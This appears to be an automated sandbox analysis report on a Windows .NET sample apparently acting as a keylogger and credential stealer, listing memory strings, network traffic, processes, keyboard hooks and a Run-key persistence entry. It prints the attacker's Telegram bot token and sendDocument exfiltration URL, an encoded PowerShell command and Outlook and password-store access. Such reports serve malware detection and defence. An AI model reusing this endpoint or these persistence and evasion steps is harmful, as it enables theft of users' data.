                Source: file.exe, 00000000.00000002.392570206.0000000005DE0000.00000004.08000000.00040000.00000000.sdmp, file.exe, 00000000.00000002.385810798.0000000002DC4000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.373488964.0000000003E51000.00000004.00000800.00020000.00000000.sdmp, Qasvjoldkyh.exe, 00000005.00000003.506380534.0000000003E0A000.00000004.00000800.00020000.00000000.sdmp, Qasvjoldkyh.exe, 00000005.00000002.528261836.0000000002782000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000008.00000002.586095089.00000000036B4000.00000004.00000800.00020000.00000000.sdmp, Qasvjoldkyh.exe, 00000009.00000002.571009557.00000000034F4000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 0000000C.00000002.614878151.0000000002DF2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
                Source: file.exe, 00000000.00000002.392570206.0000000005DE0000.00000004.08000000.00040000.00000000.sdmp, file.exe, 00000000.00000002.385810798.0000000002DC4000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.373488964.0000000003E51000.00000004.00000800.00020000.00000000.sdmp, Qasvjoldkyh.exe, 00000005.00000003.506380534.0000000003E0A000.00000004.00000800.00020000.00000000.sdmp, Qasvjoldkyh.exe, 00000005.00000002.528261836.0000000002782000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000008.00000002.586095089.00000000036B4000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000008.00000002.603231673.0000000004D6F000.00000004.00000800.00020000.00000000.sdmp, Qasvjoldkyh.exe, 00000009.00000002.592591106.0000000004BAF000.00000004.00000800.00020000.00000000.sdmp, Qasvjoldkyh.exe, 00000009.00000002.571009557.00000000034F4000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 0000000C.00000002.640909685.00000000044AF000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 0000000C.00000002.614878151.0000000002DF2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
                Source: file.exe, 00000000.00000002.392570206.0000000005DE0000.00000004.08000000.00040000.00000000.sdmp, file.exe, 00000000.00000002.385810798.0000000002DC4000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.373488964.0000000003E51000.00000004.00000800.00020000.00000000.sdmp, Qasvjoldkyh.exe, 00000005.00000003.506380534.0000000003E0A000.00000004.00000800.00020000.00000000.sdmp, Qasvjoldkyh.exe, 00000005.00000002.528261836.0000000002782000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000008.00000002.586095089.00000000036B4000.00000004.00000800.00020000.00000000.sdmp, Qasvjoldkyh.exe, 00000009.00000002.571009557.00000000034F4000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 0000000C.00000002.614878151.0000000002DF2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/NETFoundationProjectsCodeSigningCA2.crl0F
                Source: file.exe, 00000000.00000002.392570206.0000000005DE0000.00000004.08000000.00040000.00000000.sdmp, file.exe, 00000000.00000002.385810798.0000000002DC4000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.373488964.0000000003E51000.00000004.00000800.00020000.00000000.sdmp, Qasvjoldkyh.exe, 00000005.00000003.506380534.0000000003E0A000.00000004.00000800.00020000.00000000.sdmp, Qasvjoldkyh.exe, 00000005.00000002.528261836.0000000002782000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000008.00000002.586095089.00000000036B4000.00000004.00000800.00020000.00000000.sdmp, Qasvjoldkyh.exe, 00000009.00000002.571009557.00000000034F4000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 0000000C.00000002.614878151.0000000002DF2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/NETFoundationProjectsCodeSigningCA2.crl0=
                Source: kDPmkTm.exe, 0000000C.00000002.614878151.0000000002DF2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://james.newtonking.com/projects/json
                Source: file.exe, 00000000.00000002.385810798.0000000002DC4000.00000004.00000800.00020000.00000000.sdmp, Qasvjoldkyh.exe, 00000005.00000002.528261836.00000000027BC000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000008.00000002.586095089.00000000036B4000.00000004.00000800.00020000.00000000.sdmp, Qasvjoldkyh.exe, 00000009.00000002.571009557.00000000034F4000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 0000000C.00000002.614878151.0000000002DF2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
                Source: file.exe, 00000000.00000002.392570206.0000000005DE0000.00000004.08000000.00040000.00000000.sdmp, file.exe, 00000000.00000002.385810798.0000000002DC4000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.373488964.0000000003E51000.00000004.00000800.00020000.00000000.sdmp, Qasvjoldkyh.exe, 00000005.00000003.506380534.0000000003E0A000.00000004.00000800.00020000.00000000.sdmp, Qasvjoldkyh.exe, 00000005.00000002.528261836.0000000002782000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000008.00000002.586095089.00000000036B4000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000008.00000002.603231673.0000000004D6F000.00000004.00000800.00020000.00000000.sdmp, Qasvjoldkyh.exe, 00000009.00000002.592591106.0000000004BAF000.00000004.00000800.00020000.00000000.sdmp, Qasvjoldkyh.exe, 00000009.00000002.571009557.00000000034F4000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 0000000C.00000002.640909685.00000000044AF000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 0000000C.00000002.614878151.0000000002DF2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.digicert.com0A
                Source: file.exe, 00000000.00000002.392570206.0000000005DE0000.00000004.08000000.00040000.00000000.sdmp, file.exe, 00000000.00000002.385810798.0000000002DC4000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.373488964.0000000003E51000.00000004.00000800.00020000.00000000.sdmp, Qasvjoldkyh.exe, 00000005.00000003.506380534.0000000003E0A000.00000004.00000800.00020000.00000000.sdmp, Qasvjoldkyh.exe, 00000005.00000002.528261836.0000000002782000.00000004.00000800.00020000.00000000.sdmp, Qasvjoldkyh.exe, 00000005.00000002.528261836.00000000027BC000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000008.00000002.586095089.00000000036B4000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000008.00000002.603231673.0000000004D6F000.00000004.00000800.00020000.00000000.sdmp, Qasvjoldkyh.exe, 00000009.00000002.592591106.0000000004BAF000.00000004.00000800.00020000.00000000.sdmp, Qasvjoldkyh.exe, 00000009.00000002.571009557.00000000034F4000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 0000000C.00000002.640909685.00000000044AF000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 0000000C.00000002.614878151.0000000002DF2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.digicert.com0C
                Source: file.exe, 00000000.00000002.392570206.0000000005DE0000.00000004.08000000.00040000.00000000.sdmp, file.exe, 00000000.00000002.385810798.0000000002DC4000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.373488964.0000000003E51000.00000004.00000800.00020000.00000000.sdmp, Qasvjoldkyh.exe, 00000005.00000003.506380534.0000000003E0A000.00000004.00000800.00020000.00000000.sdmp, Qasvjoldkyh.exe, 00000005.00000002.528261836.0000000002782000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000008.00000002.586095089.00000000036B4000.00000004.00000800.00020000.00000000.sdmp, Qasvjoldkyh.exe, 00000009.00000002.571009557.00000000034F4000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 0000000C.00000002.614878151.0000000002DF2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.digicert.com0O
                Source: file.exe, 00000000.00000002.392570206.0000000005DE0000.00000004.08000000.00040000.00000000.sdmp, file.exe, 00000000.00000002.385810798.0000000002DC4000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.373488964.0000000003E51000.00000004.00000800.00020000.00000000.sdmp, Qasvjoldkyh.exe, 00000005.00000003.506380534.0000000003E0A000.00000004.00000800.00020000.00000000.sdmp, Qasvjoldkyh.exe, 00000005.00000002.528261836.0000000002782000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000008.00000002.586095089.00000000036B4000.00000004.00000800.00020000.00000000.sdmp, Qasvjoldkyh.exe, 00000009.00000002.571009557.00000000034F4000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 0000000C.00000002.614878151.0000000002DF2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.digicert.com0X
                Source: file.exe, 00000004.00000002.618527573.0000000002C91000.00000004.00000800.00020000.00000000.sdmp, Qasvjoldkyh.exe, 0000000F.00000002.574894643.0000000002C22000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000013.00000002.616219501.0000000003471000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                Source: file.exe, 00000000.00000002.392570206.0000000005DE0000.00000004.08000000.00040000.00000000.sdmp, file.exe, 00000000.00000002.385810798.0000000002DC4000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.373488964.0000000003E51000.00000004.00000800.00020000.00000000.sdmp, Qasvjoldkyh.exe, 00000005.00000003.506380534.0000000003E0A000.00000004.00000800.00020000.00000000.sdmp, Qasvjoldkyh.exe, 00000005.00000002.528261836.0000000002782000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000008.00000002.586095089.00000000036B4000.00000004.00000800.00020000.00000000.sdmp, Qasvjoldkyh.exe, 00000009.00000002.571009557.00000000034F4000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 0000000C.00000002.614878151.0000000002DF2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.digicert.com/CPS0
                Source: kDPmkTm.exe, 00000013.00000002.653315830.0000000006C60000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.microsoft.s
                Source: file.exe, 00000004.00000002.618527573.0000000002C91000.00000004.00000800.00020000.00000000.sdmp, Qasvjoldkyh.exe, 0000000F.00000002.574894643.0000000002C11000.00000004.00000800.00020000.00000000.sdmp, Qasvjoldkyh.exe, 0000000F.00000002.574894643.0000000002C22000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000013.00000002.616219501.0000000003471000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.ipify.org
                Source: Qasvjoldkyh.exe, 0000000F.00000002.574894643.0000000002C22000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000013.00000002.616219501.0000000003471000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.ipify.org/
                Source: Qasvjoldkyh.exe, 0000000F.00000002.574894643.0000000002C22000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.ipify.org4
                Source: file.exe, 00000004.00000002.618527573.0000000002CF6000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000013.00000002.616219501.00000000034D6000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org
                Source: Qasvjoldkyh.exe, 0000000F.00000002.574894643.0000000002C11000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000013.00000002.616219501.0000000003471000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org/bot5687731944:AAEDpsUftmaHrKNSGkOlhq0UZLPEvIUd8Bo/
                Source: file.exe, 00000004.00000002.618527573.0000000002CF6000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000013.00000002.616219501.00000000034D6000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org/bot5687731944:AAEDpsUftmaHrKNSGkOlhq0UZLPEvIUd8Bo/sendDocument
                Source: file.exe, 00000004.00000002.618527573.0000000002CF6000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000013.00000002.616219501.00000000034D6000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org4
                Source: file.exe, 00000000.00000003.373488964.0000000003E51000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.390593122.0000000005710000.00000004.08000000.00040000.00000000.sdmp | String found in binary or memory: https://urn.to/r/sds_see
                Source: kDPmkTm.exe, 0000000C.00000002.614878151.0000000002DF2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.newtonsoft.com/json
                Source: kDPmkTm.exe, 0000000C.00000002.614878151.0000000002DF2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.newtonsoft.com/jsonschema
                Source: file.exe, 00000000.00000002.392570206.0000000005DE0000.00000004.08000000.00040000.00000000.sdmp, file.exe, 00000000.00000002.385810798.0000000002DC4000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.373488964.0000000003E51000.00000004.00000800.00020000.00000000.sdmp, Qasvjoldkyh.exe, 00000005.00000003.506380534.0000000003E0A000.00000004.00000800.00020000.00000000.sdmp, Qasvjoldkyh.exe, 00000005.00000002.528261836.0000000002782000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000008.00000002.586095089.00000000036B4000.00000004.00000800.00020000.00000000.sdmp, Qasvjoldkyh.exe, 00000009.00000002.571009557.00000000034F4000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 0000000C.00000002.614878151.0000000002DF2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.nuget.org/packages/Newtonsoft.Json.Bson
                Source: unknown | HTTP traffic detected: POST /bot5687731944:AAEDpsUftmaHrKNSGkOlhq0UZLPEvIUd8Bo/sendDocument HTTP/1.1 Content-Type: multipart/form-data; boundary=---------------------------8db29b545d5b5a8 Host: api.telegram.org Content-Length: 972 Expect: 100-continue Connection: Keep-Alive
                Source: unknown | DNS traffic detected: queries for: api.ipify.org
                Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0 Host: api.ipify.org Connection: Keep-Alive
                Source: unknown | HTTPS traffic detected: 104.237.62.211:443 -> 192.168.2.4:49697 version: TLS 1.2
                Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49698 version: TLS 1.2
                Source: unknown | HTTPS traffic detected: 104.237.62.211:443 -> 192.168.2.4:49700 version: TLS 1.2
                Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49702 version: TLS 1.2

                Key, Mouse, Clipboard, Microphone and Screen Capturing

                Source: C:\Users\user\Desktop\file.exe | Windows user hook set: 0 keyboard low level C:\Users\user\Desktop\file.exe
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe | Windows user hook set: 0 keyboard low level C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe
                Source: file.exe, 00000000.00000002.384459373.0000000000E50000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>
                Source: C:\Users\user\Desktop\file.exe | Window created: window name: CLIPBRDWNDCLASS
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe | Window created: window name: CLIPBRDWNDCLASS
                Source: file.exe | Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_056E4A80
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_056E2369
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_056E2378
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_056E4A72
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_056E152F
                Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_0123C978
                Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_0123A9B8
                Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_01239DA0
                Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_0123A0E8
                Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_06980870
                Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_069855C0
                Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_0698C8AC
                Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_06C46210
                Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_06C430A8
                Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_06C48E18
                Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_06C42370
                Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_06C4237C
                Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_06C43080
                Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_06C43000
                Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_06C4CD99
                Source: file.exe, 00000000.00000002.385810798.0000000002D14000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamef7b8a578-bf20-4913-ad1a-1959db4fc78b.exe4 vs file.exe
                Source: file.exe, 00000000.00000002.392570206.0000000005DE0000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameNewtonsoft.Json.dll2 vs file.exe
                Source: file.exe, 00000000.00000002.385810798.0000000002DC4000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameNewtonsoft.Json.dll2 vs file.exe
                Source: file.exe, 00000000.00000002.388743810.0000000003D59000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamef7b8a578-bf20-4913-ad1a-1959db4fc78b.exe4 vs file.exe
                Source: file.exe, 00000000.00000003.372912348.00000000055E1000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameMtzdyotephm.exe" vs file.exe
                Source: file.exe, 00000000.00000003.373488964.0000000003E51000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameTmonzgkzafmfijmsj.dll" vs file.exe
                Source: file.exe, 00000000.00000003.373488964.0000000003E51000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameNewtonsoft.Json.dll2 vs file.exe
                Source: file.exe, 00000000.00000002.384459373.0000000000E50000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameclr.dllT vs file.exe
                Source: file.exe, 00000000.00000002.385810798.0000000002C81000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamef7b8a578-bf20-4913-ad1a-1959db4fc78b.exe4 vs file.exe
                Source: file.exe, 00000000.00000002.388743810.0000000003CC6000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamef7b8a578-bf20-4913-ad1a-1959db4fc78b.exe4 vs file.exe
                Source: file.exe, 00000000.00000000.305756685.0000000000840000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenameMtzdyotephm.exe" vs file.exe
                Source: file.exe, 00000000.00000002.390593122.0000000005710000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameTmonzgkzafmfijmsj.dll" vs file.exe
                Source: file.exe, 00000004.00000002.609344708.0000000000FEA000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameclr.dllT vs file.exe
                Source: file.exe, 00000004.00000002.618527573.0000000002D29000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameEXPLORER.EXE.MUIj% vs file.exe
                Source: file.exe, 00000004.00000002.618527573.0000000002D29000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilename vs file.exe
                Source: file.exe, 00000004.00000002.618527573.0000000002D29000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: q,\\StringFileInfo\\040904B0\\OriginalFilename vs file.exe
                Source: file.exe, 00000004.00000003.389929403.00000000066CF000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameMtzdyotephm.exe" vs file.exe
                Source: file.exe, 00000004.00000002.608064863.0000000000D68000.00000004.00000010.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameUNKNOWN_FILET vs file.exe
                Source: file.exe | Binary or memory string: OriginalFilenameMtzdyotephm.exe" vs file.exe
                Source: file.exe | ReversingLabs: Detection: 35%
                Source: file.exe | Virustotal: Detection: 44%
                Source: C:\Users\user\Desktop\file.exe | File read: C:\Users\user\Desktop\file.exe
                Source: file.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: C:\Users\user\Desktop\file.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                Source: unknown | Process created: C:\Users\user\Desktop\file.exe C:\Users\user\Desktop\file.exe
                Source: C:\Users\user\Desktop\file.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMgAwAA==
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\file.exe | Process created: C:\Users\user\Desktop\file.exe C:\Users\user\Desktop\file.exe
                Source: unknown | Process created: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe "C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe"
                Source: unknown | Process created: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe "C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe"
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMgAwAA==
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMgAwAA==
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe | Process created: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe | Process created: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe
                Source: C:\Users\user\Desktop\file.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32
                Source: C:\Users\user\Desktop\file.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                Source: C:\Users\user\Desktop\file.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                Source: C:\Users\user\Desktop\file.exe | File created: C:\Users\user\AppData\Roaming\Uwztwjweuc
                Source: C:\Users\user\Desktop\file.exe | File created: C:\Users\user\AppData\Local\Temp\CdFileMgr
                Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@22/15@8/3
                Source: C:\Users\user\Desktop\file.exe | File read: C:\Users\user\Desktop\desktop.ini
                Source: Qasvjoldkyh.exe, 0000000F.00000002.574894643.0000000002CBD000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: file.exe | Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                Source: C:\Users\user\Desktop\file.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4136:120:WilError_01
                Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5020:120:WilError_01
                Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5680:120:WilError_01
                Source: C:\Users\user\Desktop\file.exe | File read: C:\Windows\System32\drivers\etc\hosts
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe | File read: C:\Windows\System32\drivers\etc\hosts
                Source: Window Recorder | Window detected: More than 3 window changes detected
                Source: C:\Users\user\Desktop\file.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                Source: file.exe | Static PE information: Virtual size of .text is bigger than: 0x100000
                Source: C:\Users\user\Desktop\file.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                Source: file.exe | Static file information: File size 1825280 > 1048576
                Source: file.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                Source: file.exe | Static PE information: Raw size of .text is bigger than: 0x100000 < 0x1bd000
                Source: file.exe | Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Binary string: /_/Src/Newtonsoft.Json/obj/Release/net40/Newtonsoft.Json.pdb source: file.exe, 00000000.00000002.392570206.0000000005DE0000.00000004.08000000.00040000.00000000.sdmp, file.exe, 00000000.00000002.385810798.0000000002DC4000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.373488964.0000000003E51000.00000004.00000800.00020000.00000000.sdmp, Qasvjoldkyh.exe, 00000005.00000003.506380534.0000000003E0A000.00000004.00000800.00020000.00000000.sdmp, Qasvjoldkyh.exe, 00000005.00000002.528261836.0000000002782000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000008.00000002.586095089.00000000036B4000.00000004.00000800.00020000.00000000.sdmp, Qasvjoldkyh.exe, 00000009.00000002.571009557.00000000034F4000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 0000000C.00000002.614878151.0000000002DF2000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: /_/Src/Newtonsoft.Json/obj/Release/net40/Newtonsoft.Json.pdbSHA256 source: file.exe, 00000000.00000002.392570206.0000000005DE0000.00000004.08000000.00040000.00000000.sdmp, file.exe, 00000000.00000002.385810798.0000000002DC4000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.373488964.0000000003E51000.00000004.00000800.00020000.00000000.sdmp, Qasvjoldkyh.exe, 00000005.00000003.506380534.0000000003E0A000.00000004.00000800.00020000.00000000.sdmp, Qasvjoldkyh.exe, 00000005.00000002.528261836.0000000002782000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000008.00000002.586095089.00000000036B4000.00000004.00000800.00020000.00000000.sdmp, Qasvjoldkyh.exe, 00000009.00000002.571009557.00000000034F4000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 0000000C.00000002.614878151.0000000002DF2000.00000004.00000800.00020000.00000000.sdmp
                Source: C:\Users\user\Desktop\file.exe | File created: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe
                Source: C:\Users\user\Desktop\file.exe | File created: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe

                Boot Survival

                Source: C:\Users\user\Desktop\file.exe | Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run kDPmkTm
